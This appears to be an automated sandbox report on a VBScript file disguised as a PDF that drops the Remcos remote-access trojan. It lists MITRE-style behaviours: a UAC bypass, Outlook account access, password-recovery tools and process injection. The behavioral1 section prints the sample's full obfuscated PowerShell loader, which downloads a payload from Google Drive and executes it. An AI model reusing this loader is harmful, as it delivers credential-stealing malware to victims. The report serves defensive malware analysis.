Malware Analysis Report

2024-12-07 17:41

Sample ID 241112-wx64es1nhm
Target Document BT24·pdf.vbs
SHA256 cecb613e2e7877b680323862198f05c9634c1dc3e7c64ed95cc3154e9c5e9fd4
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cecb613e2e7877b680323862198f05c9634c1dc3e7c64ed95cc3154e9c5e9fd4

Threat Level: Known bad

The file Document BT24·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

NirSoft WebBrowserPassView

Detected Nirsoft tools

NirSoft MailPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 18:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 18:19

Reported

2024-11-12 18:21

Platform

win7-20240903-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabF8A3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2568-20-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

memory/2568-21-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

memory/2568-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2568-23-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-24-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-25-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-26-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-27-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-28-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-29-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

memory/2568-30-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-31-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-32-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

memory/2568-33-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 18:19

Reported

2024-11-12 18:21

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2720 set thread context of 2436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 set thread context of 3432 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 set thread context of 1488 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 5116 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 5116 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 224 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 224 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 224 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 224 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 4464 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 4464 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 4464 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4464 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4464 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4464 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2720 wrote to memory of 3476 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2720 wrote to memory of 3476 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 2268 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
